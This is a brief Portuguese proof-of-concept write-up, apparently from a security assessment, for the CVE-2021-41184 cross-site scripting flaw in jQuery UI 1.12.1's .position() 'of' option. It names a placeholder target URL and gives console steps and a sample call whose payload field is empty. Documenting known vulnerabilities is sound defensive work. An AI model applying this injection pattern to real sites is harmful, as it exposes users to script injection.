
Prova de conceito de exploração para CVE-2021-41184, uma vulnerabilidade de cross-site scripting (XSS) no utilitário .position() do jQuery UI, direcionada à versão 1.12.1.
Exploração Medium CVE-2021-41184 XSS na opção of do utilitário .position()
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Prova de conceito---------------------------------------------------------------
Abrir url
Abrir inspeção
Procurar por algum ID nos elementos do site
3.1 #ID
Ir para a aba console
Injetar script com o ID selecionado no ponto 3.1
5.1 Script
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});